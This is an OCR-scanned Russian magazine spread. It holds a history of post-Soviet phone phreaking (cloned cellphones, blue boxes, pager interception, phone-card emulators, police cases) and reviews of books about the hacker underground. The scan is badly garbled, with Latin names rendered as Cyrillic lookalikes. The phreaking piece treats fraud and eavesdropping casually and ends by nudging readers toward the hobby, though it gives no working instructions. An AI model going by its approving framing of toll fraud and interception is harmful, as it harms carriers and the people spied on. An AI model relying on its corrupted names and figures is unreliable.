Шел 1 987 год. В это время я впервые 
столкнулся с явлением, именуемым фри- 
кингом... 

ВПЕРВЫЕ ПОПЫТКИ ФРИКП 

Фрикеры - это люди, взламывающие про- 
водные и беспроводные сети связи, неваж- 
но, ради заработка или для души. Русский 



фрикинг - явление мощное и самобытное, 
и имеет совершенно иные предпосылки, 
чем в Штатах или Европе. 

В конце 80-х годов многие толковые ре- 
бята поняли, что их работа по созданию 
советского оружия больше никого не инте- 
ресует. Один за другим закрывались НИИ, 
военные заводы, вместо комплексов С300 
и "Дарьялов" стали выпускать кастрюли и 
вилы с лопатами. Это называлось Конвер- 
сией, но на самом деле было началом ги- 
бели Системы. Кто-то из специалистов, ос- 
тавшихся не при делах, стал приторговы- 
вать, кто-то срулил за границу, некоторые 
искали способы реализовать свои знания. 
Особенно много безработных умельцев по- 
явилось в городах, где были сосредоточе- 
ны конторы по разработке военной элект- 
роники, таких как Москва, 

Питер, Новосибирск, Харьков... 

Первым глобальным фриком были, ко- 
нечно же, АОНы. Эти устройства использо- 
вали особенности построения телефонных 
сетей в совке - выдавая запрос, аналогич- 
ный запросу междугородней телефонной 
станции, получали номер звонящего и выс- 
вечивали его на индикаторе. Сначала де- 
вайсами пользовались немногие, но со 






ФРИКИНГНПШИНДНЕЙ 



временем АОНы набрали популярность и 
теперь есть почти у всех. 

В конце восьмидесятых фрикеры начи- 
нают хакать «Алтай» - советскую систему 
радиотелефонной связи. После того как к 
нему приложили руку фрикеры, телефон в 
машине перестал кого-либо удивлять. Сис- 
темы «Алтай» работают до сих пор, дыры в 
них практически не латали, но теперь ими 
почти никто не пользуется. Слишком боль- 
шой базовый блок и корявая трубка уже не 
привлекают внимания специалистов. Одна- 
ко у модифицированного «Алтая» в Москве 
до сих пор есть двойники, юзающие совре- 
менные алтаевские блоки (их делают фин- 
ны) и обеспечивающие халявной междуго- 
родкой. 

^ХПКНУТЫЕ РПДИОТЕПЕФОНЫ 

В начале 90-х появились домашние радиоте- 
лефоны - простейшие одноканальные уст- 
ройства, позволяющие использовать трубку 
без проводов за пару десятков метров от ба- 
зы. Сама база подключалась к телефонной 
линии. Радиотелефоны делались в Китае, бы- 
ли относительно недорогими и быстро расп- 
ространились по всему СНГ. Люди, которые 








ПРОШШКП И МЕЖДУГОРОДНИЕ звонки 

М уха, он же Транзит - устройство, сделанное на основе моди- 
фицированного АОНа. Позволяет совершать междугородние 
звонки по тарифам внутриобластного звонка, а также прослуши- 
вать разговоры, ведущиеся с других проводных телефонов. 



ставили такие девайсы домой, очень сильно 
рисковали. Любители халявы брали трубку от 
такого же радиотелефона и ходили по подъ- 
ездам, периодически нажимая на ТАІ.К. 

Если информация о чужой базе просачи- 
валась во фрикерские массы, через пару 
недель хозяин получал космический счет и 
несколько метров распечаток по звонкам в 
Китай, на Филиппины и в другие дальние 
страны. Слухи об огромных убытках среди 
владельцев радиотелефонов распространи- 
лись молниеносно, что привело к полному 
исчезновению этих моделей радиотелефо- 
нов. На смену им пришли более современ- 
ные - 900-мегагерцовые панасоники и 
запуо, работавшие в диапазоне 300 мега- 
герц. Они имели кодировку, были многока- 
нальными и работали на расстоянии до ки- 
лометра. Первые месяцы такие телефоны 
считались надежными, но наши фрикеры 
времени не теряли и придумали устройство 
под названием сканер. Сканер представлял 
собой модифицированную трубку, которая 
прослушивала чужие базы, расшифровыва- 
ла и записывала их коды. Когда хозяину 
сканера требовалось позвонить, он пользо- 
вался одной из чужих баз. Теперь уже не 
нужно было ходить по подъездам - новая 
модель имела приличный радиус действия. 
В крупных городах в то время не было ни 
одной базы, через которую не звонили ска- 
нером. Особенно неравнодушны к скане- 
рам были вьетнамцы, которые скупали их 
на Митино пачками. 

^КПКХОКППИОМРЗ 

В 1991 году в Питере появилась первая в 
совке сотовая сеть стандарта ММТ450. Ка- 
кое-то время никто не знал, как к ней подс- 
тупиться, но потом появились первые отклю- 
ченные телефоны из этой сети. Те, над кото- 
рыми проводились первые эксперименты и 
из которых образовались первые клоны. 
Сначала трубка подключалась к одному ле- 
вому номеру, что было заметно для офици- 
ального владельца. Чуть позже в нее доба- 
вили микропроцессор, и тогда стало воз- 
можным переключаться между несколькими 
номерами. Знающие люди пользовались 
этой фишкой втихую, делая девайсы только 
для себя и друзей. Потом появились парни 
из Прибалтики, которые поставили дело на 
конвейер. По увеличению трафика и наездам 
от абонентов операторы быстро поняли - в 
сетях ММТ450 полно двойников. Надо было 
что-то предпринимать. 

В 1994 году большинство сетей ММТ450 
стали оборудоваться 513 - продвинутой 
системой аутентификации абонента. С ее 
внедрением возможность фрика сетей это- 
го вида умерла навсегда. 

К тому времени в Москве, Питере и нес- 
кольких других крупных городах появилась 
другая система сотовой связи на основе 
американского стандарта АМР5. Покопав- 




сканерАМРЗ 



шись в ней, фрикеры поняли, что взломать 
эту сеть несложно. В результате появились 
первые телефоны-двойники, которые хоть 
и звонили с одного номера, но предостав- 
ляли возможность менять номер прямо с 
клавиатуры трубы. Помнится, в то время 
ходили скан-листы, в которые были занесе- 
ны две-три сотни актуальных номеров. 

Оператор, конечно, пытался как-то оста- 
новить халявный трафик. Вычислялись ле- 
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вые номера, и на них потом звонили для 
«профилактической беседы». Но с усовер- 
шенствованием прошивки, количество но- 
меров в памяти телефона-клона достигло 
ста штук, и каждый раз при новом звонке 
подставлялся очередной номер. Дальше - 
больше. Более навороченный аппарат мог 
извлекать из эфира свежие номера, осво- 
бождая пользователей от необходимости 
искать скан-листы и давая дополнительную 
защиту от происков оператора. 

А СЕРЫЕ ТЕЛЕФОНЫ 

В это время интернет стал доступен 
простым людям, и мы узнали, что амери- 
канцы, оказывается, тоже хакают АМР5 у 
себя, но как-то по-детски, используя до- 
потопные модели телефонов и «треше- 
вые» методы добывания номеров. В 96-97 
годах количество левых телефонов в мос- 
ковской сети РАМРЗ доходило до нес- 
кольких сотен. В Питере и других круп- 
ных городах этих телефонов было по- 
меньше, но операторы все равно ощуща- 
ли большую нагрузку сети левым трафи- 
ком. В конце концов, АМРЗ оснастили за- 



щитой, и хакать сеть стало бесполезно. 

Не менее сотни ломаных телефонов нахо- 
дятся в Израиле, Америке и Канаде, где 
старая, незащищенная система живет до 
сих пор. 

В начале 1996 года появились первые 
сети СЗМ 900. При создании этого 
стандарта учли многолетний опыт взаи- 
модействия фрикеров и операторов, по- 
этому ломать СЗМ с самого начала бы- 
ло бесполезно. Но, как оказалось, и 
здесь фрикерам нашлась кормушка. Са- 
ми операторы, а также их дилеры при- 
возили из Европы «серые» телефоны - 
трубки, подключенные к сети больших 
европейских операторов и реализован- 
ные по низкой цене. В России такие ап- 
параты отказывались работать, т.к. бы- 
ли залочены под сим-карты оператора, 
осуществлявшего льготную продажу-ак- 
цию. После определенных манипуляций 
с телефоном, фрикер мог заставить те- 
лефон воспринимать любые сим-карты. 
Называется это разлочка, и многие сей- 
час занимаются именно этим. Первона- 
чальная цена разлочки составляла до 
$50 за штуку, теперь она опустилась до 
50 центов. 



^НПГИЧЕСКИЕ БОКСЫ 

До сих пор я рассказывал в основном о 
беспроводных коммуникационных сетях, но 
проводные сети испытали на себе не мень- 
ше экспериментов фрикеров. Помимо АО- 
Нов, у нас были распространены разные 
«боксы» - устройства, подключаемые к те- 
лефонным линиям. Наиболее популярны 
глюк-бокс, который обеспечивает халявным 
межгородом, подставляя чужие номера, и 
блю-бокс, снижающий цену на междуго- 
родние звонки до цены внутриобластных 
переговоров, а также позволяющий прослу- 
шивать чужой номер. Глюк-боксами сейчас 
пользуются в основном вьетнамцы, органи- 
зующие у себя в общагах нелегальные пе- 
реговорные пункты. Блю-боксы обычно 
юзают, если приходится много звонить по 
России, или для того чтобы послушать, о 
чем говорит жена, когда муж на работе. 
Блю-бокс выпускается почти серийно под- 
польными конторами, и достать его не 
проблема. Глюк-боксы тоже достаточно 
распространены и имеются почти в любом 
азиатском общежитии. 



В 1993-94 годах в странах СНГ появля- 
ются пейджинговые сети. Поскольку поль- 
зование мобилой в то время было наклад- 
ным, пейджер являлся своеобразной аль- 
тернативой, обеспечивая оперативную, на- 
дежную, но одностороннюю связь. Фрик 
пейджинга начался практически сразу пос- 
ле появления пейджинговых сетей на прос- 
торах СНГ. За небольшую плату фрикеры 
создавали клоны, позволявшие принимать 
те же сообщения, которые приходили за- 
конному хозяину пейджера. Пользовались 
этим по-разному - ревнивые мужья виде- 
ли, что падает на пейджер их женам, биз- 
несмены знали о состоянии дел своих кон- 
курентов. В Москве образовались целые 
комплексы мониторинга, которые прослу- 
шивали одновременно всех московских 



пейджинговых операторов и записывали 
информацию на винт. Когда требовалось 
узнать о чьей-либо деятельности, вводился 
номер пейджера, и владелец комплекса ви- 
дел все мессаги, поступавшие к человеку 
за последнее время. Сейчас пейджинг 
практически не хакают, т.к. это стало неин- 
тересно. Пейджерами уже почти никто не 
пользуется, и, видимо, в ближайшее время 
пейджинговые сети будут сворачивать. 

^ ФРИКЕРСКИЙ КПРТИНГ 

Рассказ о фрикинге будет неполным, если 
не упомянуть о смарт-картах. Они все ак- 
тивнее входят в нашу жизнь и используют- 
ся, когда надо позвонить из телефона-ав- 
томата, пройти в метро и в других случаях. 
Для фрикера представляют интерес все 
смарт-карты, но предпочтение отдается те- 
лефонным. С тех пор как в таксофонах на- 
чала осуществляться замена монетоприем- 
ника картоприемником, фрикеры придума- 
ли способы не покупать легальных карт и, 
тем не менее, пользоваться таксофонами. 
Все зависит от железа и чипа, на которых 
основан аппарат. В подавляющем больши- 
нстве случаев применяются так называе- 
мые эмуляторы карт - микропроцессоры, 
имитирующие работу чипа с легальной кар- 
точки. Разница в том, что количество юни- 
тов в эмуляторе задает фрикер. Кроме то- 
го, эмулятор периодически восстанавлива- 
ет баланс юнитов до полного номинала. 
Делать качественные эмуляторы - это це- 
лая технология, и самое сложное тут даже 



не программирование эмулятора, а про- 
цесс установки чипа под контактную пло- 
щадку карты, толщина которой меньше 
миллиметра. Продвинутые фрикеры научи- 
лись обтачивать 5010-корпус и запаивать 
на контактные площадки спиленные выво- 
ды от процессора. 

Трудно сказать, кто первым начал хакать 
смарт-карты. Описания эмулей впервые 
появились в Рісіопеі лет семь назад, а пер- 
вый качественный материал по этой теме 
разместили в Сети испанцы. Их эмуль был 
сделан на основе допотопного мотороловс- 
кого процессора и имел массу недостатков, 
но начало было положено, и эмули стали 
изготовляться повсеместно. 

Надо признать, что по эмуляторам в СНГ 
самые крутые - украинские фрикеры. Они 
не только хакнули местный телеком, но и 
разобрались с картами для России и Евро- 
пы. Как оказалось, в Европе эмули тоже 
популярны - пользоваться таксофонами 
для звонков за рубеж дорого. Последние 
успехи карточных фрикеров в том, что они 
научились искусственно генерировать пра- 
вильные номера карт. А это означает бес- 
смысленность ведения телекомом стоп- 
листов левых карт. По-видимому, скоро па- 
дет и активная аутентификация - довольно 
серьезная защита, придуманная создателя- 



НТО Т0К0Е СОТОВЫЙ СКОНЕР? 

С отовый сканер - модифицированный телефон фирмы Мото- 
рола, позволяющий перехватывать из эфира номера або- 
нентов сотовой связи и звонить под этими номерами. Опреде- 
ленные модели сканеров позволяют прослушивать разговоры 
в сотовой сети, в том числе и цифровом ОАМР5. 



В 96-97 годах количество левых 
телефонов в московской сети 0АМР5 
доходило до нескольких сотен. 



Надо признать, нто по эмуляторам в СНГ 
самые крутые - украинские фрикеры. 




ми стандарта смарт-карт для защиты от эмуляторов. 

В настоящий момент защита применяется далеко не везде, но 
там, где она есть, эмуляторы не работают. 

А В ПОГОНЕ 30 ФРИКЕРОИ 

У тебя может возникнуть вопрос - почему же бездействуют опе- 
раторы, если в их сетях творится такой беспредел. Операторы 
не бездействуют, особенно в последнее время. В силовых 
структурах созданы специальные отделы, которые пытаются бо- 
роться с электронной преступностью. Насколько эффективно 
они работают на самом деле - неизвестно. Но некоторые выво- 
ды можно сделать, исходя из событий, освещенных в СМИ. 

В 1996-97 годах отделом «Р» в Москве неоднократно задер- 
живались изготовители и продавцы сканеров РАМРВ. У сотруд- 
ников были данные, по крайней мере, по четырем независи- 
мым разработчикам и изготовителям сканеров. Чуть позже, в 
1999 г., в Москве та же контора задержала владельца комплек- 
са глобального пейджингового мониторинга. Парень отделался 
легким испугом - адвокат сумел доказать, что это прибор для 
наладки пейджинговых систем. В 2000 году в Харькове (Украи- 
на) была выявлена фрикерская группировка, занимавшаяся 
картами метро. К моменту задержания у них имелся реализа- 
тор чуть ли не на каждой станции метро, почти во всех студен- 
ческих общежитиях (собственно, через одного такого реализа- 
тора отдел «Р» и вышел на изготовителей карт). В конце кон- 
цов, все мемберы остались на свободе, но деятельность свер- 
нули. К тому же в метро поменяли кодировку таким образом, 
что восстановление метрокарт стало невозможным, а ходить с 
эмулятором через турникет вряд ли кто-то захочет. В прессе 
также постоянно появляются заметки о ликвидации очередного 
нелегального переговорного пункта. Это действительно до- 
вольно распространенное явление - азиаты снимают квартиру 
с телефоном, к телефону цепляется тот самый глюк-бокс с мо- 
билой, и переговорный пункт готов. 

Вообще, противодействие фрикерам - бесполезное занятие. 
Затраты на поимку фрикера соизмеримы с нанесенными им 
убытками. Имхо, единственный, верный способ снизить коли- 
чество телефонных махинаций - регулирование ценовой поли- 
тики. Когда появился СРМА, пользование сканером АМР5 стало 
бессмысленным. Зачем рисковать, если СЭМА - практически 
бесплатная услуга? Появилась ІР-телефония, звонить стало де- 
шевле, и количество нелегальных переговорных пунктов замет- 
но сократилось. 

А надо ПИ ТЕБЕ это? 

Если, прочитав эту статью, ты решил стать фрикером, подумай, 
оно тебе надо? Если твоя мотивация - заработок, то есть масса 
других, более простых и безопасных способов заработать на 
жизнь. Ну а если тебе это в кайф, тогда бросай лазить по пор- 
носайтам и анинсталь любимые игрушки. Тебе понадобится 
прочитать массу материалов по телекоммуникациям, подру- 
житься с паяльником и освоить почти забытое слово ассемблер. 
Больше читай, думай, анализируй, экспериментируй. Сходи на 
рынок, купи там Пик и Авр, научись их программировать и пи- 
сать под них программки (ты до сих пор не знаешь, что это та- 
кое?). Купи или найди в Сети книги Гольдштейна - этот дядеч- 
ка мог объяснить устройство телефонии, работающей на прос- 
торах СНГ, простым и доступным языком. Изучи стандарт 
1307816 - на его основе работают практически все современ- 
ные смарт-карты. В Сети ты всегда найдешь людей, так или 
иначе связанных с фрикингом. Попробуй продемонстрировать 
им свои навыки, спроси, чем занимаются они. 

Свяжешь ты свою дальнейшую жизнь с фрикингом или нет - ре- 
шать тебе, но в любом случае, полученные знания не помеша- 
ют. А может быть, ты станешь специалистом и изобретешь но- 
вое устройство, способное облегчить людям жизнь. ЗС 
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іт назад были частью компьютерного андеграунда, первое, на что обращаешь 
внимание - все они с грустью вспоминают о прошлом. О том времени, когда еще не было интернета, а модемы на 2400 бод 
считались счастьем. Тогда хакерский мир был открыт для немногих, и в нем царила своя неповторимая атмосфера. 

Теперь все изменилось. Несомненно, компьютерный андеграунд существует и сейчас, и в нем также присутствует свой дух. Но студенты 
МИТ уже не караулят "Тэкси" по ночам, хакеры не дозваниваются сутками через весь континент на приватные станции, чтобы скачать 50 
кип почты, а дискеты с хакерским добром не прячутся под матрасом от агентов спецслужб. Осе это осталось лишь в памяти людей, 
заставших ТЕ времена. О также на страницах книг, о которых я тебе расскажу. 




ОБЗОР КНИГ ПО КОМПЬЮТЕРНОМУ ПНДЕГРПУНДУ 




^СѴВЕЯРШ:0ІІШ1Ѵ8 под 
НПСКЕН8 ОЯ ТНЕ С0ИРІ1ТЕН 
ЕПОІШЕВ, КОПЕ НПЕЯЕН & ЛШ 
ШКН0РЁ.Ш5 

З то первая книга, с которой на- 
чалось мое знакомство с хаке- 
рами. Я прекрасно помню день, 
когда ее прочитал. Золотая 
осень 1998 года. Утро. Тогда 
еще студент технического вуза 
(в котором я так и не доучился), 
перед универом забираю почту 
с местной ВВЗ. В папке /п еѵѵ обнаруживаю 
новый файлик Раскегз.іір. Открываю - книга 
про хакеров. Стал читать... в тот день я в 
универ так и не попал. 

Книга Кэти Хафнер и Джона Маркофа (они, 
кстати, на момент написания были супруга- 
ми) состоит из четырех частей, из которых 
только первые две связаны между собой. 
Первая часть - рассказ об одной из самых 
сильных хак-групп начала 80-х, Возсое дапд. 
Сначала команда имела исключительно фри- 
керскую направленность и состояла из 4 мо- 
лодых, но уже опытных фрикеров: Роско 
"Возсое" Дюпейна - ведущего телеконферен- 
ции НІІВО ІДРО в Лос-Анджелесе и буквально 
помешанного на всякого рода технических 
вещичках; Сюзен "ТІіипсІег" Хэдли - постоян- 




ной посетительницы телеконференций, со 
временем в совершенстве овладевшей иску- 
сством социальной инженерии; Кевина Мит- 
ника, ставшего одним из самых квалифици- 
рованных фрикеров в США, а затем извест- 
нейшим хакером в мире, и Стива Роудса, 




заслужившего у телеоператоров репутацию 
одного из самых назойливых фрикеров. 

В книге рассказывается о многочисленных 
выходках группы, порой вынуждавших ком- 
пании обращаться за помощью к спецслуж- 
бам. Описываются отношения внутри Возсое 
дапд: неприязнь Сьюзен и Кевина друг к 
другу, любовь Сьюзен к Роско и последую- 
щее ее предательство. 

Героем второй части становится Кевин 
Митник. Здесь уже события развиваются 
вокруг компьютеров и компьютерных сетей. 
На примере Кевина показывается, насколько 
сильным может быть влечение к хакерству, и 
к чему в итоге это может привести. 

Следующие две части - это истории Пенго 
и Роберта Морриса. Первый - немецкий ха- 
кер, вовлеченный в операцию "Эквалайзер", 
участники которой снабжали русские спецс- 
лужбы конфиденциальной информацией. 
Второй - талантливый студент Гарварда, на- 
писавший компьютерного червя, прославив- 
шего автора на весь мир. 

Несмотря на то, что многие осуждают 
Маркофа за его негативное описание Митин- 
га, на мой взгляд, журналисты провели от- 
личное расследование. Каждая часть очень 
детально и интересно описывает жизни раз- 
ных людей, охваченных одним увлечением. 
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ОНДЕГРПУНД НП БУМОГЕ 



Однозначно, "Киберпанк" - одна из лучших 
книг о хакерах, и если ты интересуешься ис- 
торией компьютерного андеграунда, это 
Мизі ВеасЬ 

ГДЕ ВЗЯТЪ: ѵѵиѵѵ.ЬидТгад.ги/ІІЬгагу/Ьоокз/Ііаскегз (рус.) 
РЕЙТИНГ: 5/5 

>ІНПСКЕП8:НЕН0Е8 

ОГ ТНЕ СОИРІІТЕН НЕІКШІТІОЦ 
ЗТЕКЕИ ІЕ1ІІ, 1984 




Слово "хакер" на протяжении последних 20 
лет регулярно появляется в прессе. Каждый 
уважающий себя журналер не упускал случая 
поведать историю о мрачном, нелюдимом 
подростке, проникшем в сверхсекретную 
систему и представляющем угрозу всему 
миру. Книга Стивена Леви о других хакерах. 
Они жили на заре появления компьютеров, 
учились в лучших вузах страны и были одни- 
ми из немногих, кто имел доступ к первым 
вычислительным машинам. Здоровенные 
железные монстры с рубильниками вместо 
клавиш притягивали технически одаренных 
ребят как магнит. Они могли целыми днями 
проводить в помещениях, где стояли ІВМ- 
704 или ТХ-0, и пытаться разобраться в них 
без всяких документаций, основываясь лишь 
на своей интуиции. 

В конце 50-х гг. в Массачусетском Техно- 
логическом Институте стало постепенно 
формироваться сообщество компьютерных 
энтузиастов, называющих себя хакерами. 
Они писали для больших машин программы 
и считали программирование лучшим из ис- 
кусств. Эти парни были настолько преданы 
своему делу, что недосыпали и недоедали - 
лишь бы еще часок посидеть у вечно заня- 
той машины. 

Я не буду пересказывать всю историю, 
описанную в книге Леви. Скажу лишь, что 
автору удалось отлично передать неповтори- 
мый дух того времени. И я уверен, любой, 
кому небезразличны компьютеры, проник- 
нется симпатией к Питеру Самсону, Алану 
Котаку, Бобу Сандерсу, Питеру Датчу и дру- 
гим героям. 

"Хакеры" не ограничивается описанием 
жизни хакеров из МТИ, хотя эта часть, бе- 
зусловно, самая интересная. Автор также 



рассказывает о буме 8-битных персональных 
компьютеров, в котором не последнюю роль 
сыграла компания Арріе. А также о первых 
игровых фирмах, таких как Зіегга, и о людях, 
в них работающих. 

Рекомендую тебе прочитать эту книгу. 
Вряд ли она кого-то оставит равнодушным. 
"Хакеры" С.Леви - моя любимая книга о хаке- 
рах и одна их самых любимых книг вообще. 

ГДЕ ВЗЯТЬ: ии.сооІег.іі/Ііаскег$ (рус.) 

РЕЙТИНГ: 5/5 



>ІШЕПСШ№:НПСКІІІС. 
ШМЕ88ІШ0В8Е88І0Й 
И ТНЕ ЕНСТНОШС ГК0ЛТ1ЕК, 
8ІІЕІЕТТЕ 0НЕѴЕІІ8 & ЛШШ 
П88ПШСЕ, 1997 




Действия практически всех известных книг 
о компьютерном андеграунде разворачива- 
ются на территории США. Можно подумать, 
что в остальных странах хакеров вообще не 
было. Конечно, это не так, и в 1997 году, на- 
конец, выходит книга, повествующая о хаке- 
рской активности в Австралии. 

"Андеграунд" состоит из 1 1 немаленьких 
частей, большинство из которых взаимосвя- 
заны и продолжают друг друга. Вначале ав- 
торы рассказывают об эпидемии червя 
ѴѴАКІК во внутренней сети І4А5А. Червячок 
наделал немало шуму и, если бы не опера- 
тивность техперсонала, мог бы сорвать важ- 
ные проекты агентства. 

Дальше рассказывается о жизни самых 
квалифицированных австралийских хакеров 
конца 80-х - начала 90-х. Мепбах, Ргіте 
Зизресі, Раг, АпШгах, РІіоепіх, ЕІесігоп - все 
они успели отметиться на сетевых просторах 
и, так или иначе, оказались под колпаком 
Австралийской Федеральной Полиции. Дрей- 
фусу и Эссендж удалось каждого из своих 
героев сделать живым. Авторы подробно 
описывают, в каких условиях живут хакеры, 
что их волнует. Большое внимание уделено 
деталям, без которых персонажи выглядели 
бы менее красочно. Параноик Мендакс хра- 
нит диски в своем домашнем пчелином 
улье, Электрон на самом деле верит в то, 
что является очередной реинкарнацией Буд- 
ды, Пармастер не доверяет даже себе, а 



Прайм Суспект находится на грани наркоти- 
ческой зависимости. У каждого из этих ребят 
нелегкая судьба, и сети - единственное мес- 
то, где они чувствовали себя спокойно. 

Добротная книга, основанная на долгом и 
кропотливом расследовании. Мне понрави- 
лась, чего и тебе желаю :). 

ГДЕ ВЗЯТЬ: иии.ипбегдгоипгі-Ьоок.сот (англ.), 
тжт.ЬидЬгац.ги/ИЬгагу/Ьоокз/ипбегдгоипс! (рус. ) 

РЕЙТИНГ: 5/5 

Л іШ8Т Е0В ГІМ: ТНЕ 8Т0НѴ 
0ЕПШПССШЕМШ 

КЕіоиітіошѵ, иш 

Т0ВІШІ8&0ІПЙ0 РИМОМ, 
2001 
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Если ты неисправимый юниксоид и целыми 
днями торчишь у компа, пытаясь воплотить в 
жизнь "революционный проект", тебе опре- 
деленно понравится эта книга. Один из двух 
ее авторов - не кто иной, как Линус Тор- 
вальдс, создатель ОЗ Ьіпих. В книге Линус 
рассказывает о своей жизни, о создании сво- 
его детища и о том, как нужно относиться к 
жизни. Будучи сначала школьником, а затем 
студентом, Торвальдс практически не вел со- 
циальной жизни. Все его существование про- 
ходило в комнате, центром которой был 
компьютер. А смыслом жизни было написа- 
ние всевозможных программ. Но, как говорит 
сам Линус, несчастным или обделенным он 
себя не чувствовал. Программирование зани- 
мало все его мысли, и он с нетерпением 
ждал окончание универа, чтобы вернуться 
домой и продолжить свои исследования. 

Автор подробно рассказывает о своем 
детстве и юности, раскрывает предпосылки 
начала работы над Ьіпих, делится тем, как 
шла работа над ним и как изменилась его 
жизнь после того, как ось стала популярной. 
Читая биографию Торвальдса, я вспомнил о 
первых хакерах из Массачусетса, которые то- 
же когда-то предпочитали жить в мире логи- 
ки и программных команд, а не сталкиваться 
с непредсказуемостью мира реального. 

Резюмирую: интересная и познавательная 
книга. Поклонникам Ьіпих и самого Линуса - 
тизі геаб, остальным просто рекомендовано 
к прочтению. 

ГДЕ ВЗЯТЪ: и$и-Іид.огд.ги/?чФІкіоге/ФмІоаі№ (рус.) 

РЕЙТИНГ: 4/5 
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В отличие от Стивена Леви, который расска- 
зал в своей книге о хакерах "старого образ- 
ца", Брюс Стерлинг повествует уже о совре- 
менных хакерах. О тех, кто взламывает 
компьютерные системы и проникает на 
компьютеры военных правительственных ор- 
ганизаций. 

Начинается книга с истории крупнейшей в 
США (и, пожалуй, во всем мире) телефонной 
компании АТ&Т. Читатель узнает о первых 
фрикерах - подростках, которые поступали 
на работу в компанию в качестве операторов 
и, пользуясь своим положением, проводили 
разные пранки. 

15 января 1990 г. системы АТ&Т в одно- 
часье рухнули. И хотя впоследствии так и не 
было доказано, что причиной этого стали ха- 
керы, правительство стало активно пресле- 
довать всех компьютерных взломщиков. В 
результате Америку охватила волна контро- 
пераций, среди которых самой известной 
стала Орегаііоп ЗипбеѵіІ. Это неспокойное 
для хакеров время вошло в историю под 
названием Наскег Сгаскбош. Именно о нем 
рассказывается на страницах книги. 

Большое внимание автор уделил рассле- 
дованию дела Крэга Неидорфа ака КпідМ 
идМпіпд, которого обвинили в причастности 
к взлому компьютеров ТРе ВеІІ. Тогда Крэг 
был главным редактором андеграундового 
журнала РІтгаск и опубликовал документ о 
безопасности службы 91 1 . Этот текст, кото- 
рый сотрудники телефонной компании оце- 
нили почти в $80 тыс., стал основной уликой. 
Однако потом оказалось, что его реальная 
цена $13, а дело яйца выеденного не стоит. 

Книгу Брюса Стерлинга многие считают 
классикой, а некоторые - даже лучшим произ- 
ведением о хакерах. С последним я однознач- 
но не согласен, но почитать может быть инте- 
ресно. Особенно тем, кто не знаком с основ- 
ными событиями хакерского андеграунда 80-х. 

ГДЕ ВЗЯТЬ: ѵѵѵѵѵѵ.ЬидІгад.ги/ІІЬгагу/Ьоокз/сгаскгіоѵѵп 
(англ.), иѵѵѵѵ.ЬидІгад.ги/ІІЬгагу/Ьоокз/сгаскбоѵѵпгиз (рус.) 

РЕЙТИНГ: 4/5 



^ИП8ТЕК8 0Г ОЕСЕРТІОИ: 

ТНЕ БПНб ТНПТ Н1ЛЕ0 
СѴВЕНЗРПСЕ, МІСНЕІЕ 8ШТПИП 
& ІІ08НШП ЩІ1ШЕК; 1 996 




Если ты читал мою статью о противостоянии 
двух известнейших в начале 90-х хак-групп 
Мазіегз оі Оесерііоп и Ьедіоп оі Роот и хо- 
чешь подробнее узнать, как все произошло - 
советую тебе обратить внимание на эту кни- 
гу. Большая ее часть посвящена описанию 
хакерских рейдов, совершаемых членами 
МоР. Правда, в качестве примера зачастую 
приводятся подростки, ковыряющиеся в му- 
сорных баках в поисках мануалов и конфи- 
денциальной инфы. Но встречаются и техни- 
ческие взломы, описанные чересчур прос- 
тецким языком. Главным героем банды авто- 
ры выбрали Пола Стайра ака Зсогріоп - его 
жизни и похождениям уделили аж 60 первых 
страниц книги. Остальное - рассказ о напад- 
ках хакерской банды на крупнейшую теле- 
фонную компанию АТ&Т, а также описание 
той самой зарубы с Ьедіоп оі Роот. 

Судя по всему, писатели провели доста- 
точно серьезное расследование, но не суме- 
ли интересно подать нарытую историю. В 
итоге получилась посредственная книга, 
претендующая на звание "триллера". Читать 
ее или нет - решай сам. 

ГДЕ ВЗЯТЬ: В кратком и более интерес- 
ном изложении здесь: 

иѵѵѵк.Ьидігад.ги/ІіЬгагу/ипбегдгоипй/ипбегдгоипбб.ІіІшІ 

РЕЙТИНГ: 3/5 

^ТНЕ СЦСКОО'8 есс: тнаскіис 
0 8РѴ ТНН0ІІСН ТНЕ МП2Е 0Е 
С0МР11ТЕН Е8РІ0ШПБЕ, 
сигг 8Т0Щ 1990 

"Яйцо кукушки" - классический детектив на 
хакерскую тему. Автор рассказывает об од- 
ном из эпизодов своей жизни, в котором 
ему - астрофизику, приехавшему в Нацио- 
нальную Лабораторию Беркли - пришлось 
стать системным администратором и высле- 
дить проникшего в систему хакера. Все на- 
чалось с того, что руководство поручило 
Клиффу расследовать небольшую ошибку в 
одном из счетов. Как оказалось позже, баг 
появился не сам по себе, и был задейство- 




■Ье Ма» ОІ І.Ѵ'П-сні'гч Езропаог 



ШІ ІШІІ 



ван компьютерным взломщиком Нипіег для 
проникновения в локальную сеть Лаборато- 
рии. Столл решил самостоятельно, без 
привлечения людей со стороны, выследить 
хакера. И шаг за шагом пошел по его следу. 

Книга не делает скидок на компьютерную 
неграмотность читателя. В ней, со всеми 
техническими подробностями, описано, как 
хакеры в 80-х проникали на компьютеры и 
чем занимались в системе. Чтобы поймать 
НипіеГа, Клиффу пришлось немало попуте- 
шествовать по Америке и даже выбраться за 
океан. Но, как можно догадаться, без хэппи- 
энда тут не обошлось. Для полноты картины 
автор даже описал свою свадьбу. 

В целом неплохое чтиво, и любителям 
Марининой или Бужкова, вероятно, понра- 
вится. Если бы автор поменьше рассказывал 
о себе любимом, а побольше о хакерах, я бы 
однозначно рекомендовал эту книгу. А так - 
смотри сам. 

ГДЕ ВЗЯТЬ: заказать на ши/.атагоп.сот 

РЕЙТИНГ: 4/5 

^ТНЕ ШРТСНМПЛ: ТНЕ ТІЛІІ8ТЕ0 
ЫРЕ ОНО СНІМЕВ 0Е8ЕНІШ 
НПСКЕН КЕШИ Р0ІЛ.8ЕШ, 
іІОІШШ І.ІТТМПІ1, 1 997 

Кевин Поулсен - фигура известная. Его афера 
с радиоконкурсом передается из уст в уста, а 
про умение творить чудеса с телефонами хо- 
дили легенды. Несмотря на то, что выходки 
Кевина не были агрессивными, в 1993 г. он 
был арестован и по совокупности обвинений 
приговорен к 5 годам лишения свободы. 

Джонатан Литман решил рассказать исто- 
рию жизни этого парня, с раннего детства до 
последнего ареста. И выяснить, действитель- 
но ли Рагк Рапіе - зловещий и разрушитель- 
ный взломщик, каким его изображали боль- 
шинство газет, или он всего лишь неспра- 
ведливо осужденный телефонный приколист. 

Если честно, когда я читал ѴѴаІсІітап, меня 
раздражало повествование в настоящем вре- 
мени. Тем не менее, благодаря многочасо- 
вым беседам Литмана с Кевином, его семьей 
и друзьями-хакерами, книга получилась впол- 
не подробной и насыщенной деталями. 

Помимо взломов и проделок Кевина, ав- 
тор описывает отношения хакера с прияте- 








уже в продаже 




лями, а также предательство одного из них, 
когда история закончилась судом. 

